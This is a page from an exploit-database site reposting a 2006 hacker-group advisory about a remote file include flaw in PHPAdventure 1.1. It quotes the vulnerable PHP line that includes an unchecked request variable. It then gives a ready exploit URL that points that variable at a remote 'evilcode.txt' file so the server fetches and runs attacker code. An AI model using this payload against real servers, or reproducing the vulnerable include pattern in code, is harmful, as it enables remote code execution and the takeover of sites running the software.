[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PHPAdventure 1.1 (ad_main.php) Remote File Include Vulnerability

Author
HER0
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1133
Category
web applications
Date add
07-11-2006
Platform
unsorted
================================================================
PHPAdventure 1.1 (ad_main.php) Remote File Include Vulnerability
================================================================



*********************************************
D.O.M TEAM
Bug found: HER0
cms: PHPAdventure
type: rfi
risk: High
nota: all the versions of PHPAdventure is affected..
********************************************
line of the code:

<?php
$_stage = 1;
include($_mygamefile);
?>

exploit:
/ad_main.php?_mygamefile=http://evilcode.txt?
****************************************************************
greetz:Sponge Bob,Bob esponja XDDDD...
******************************************************************************************



#  0day.today [2024-12-26]  #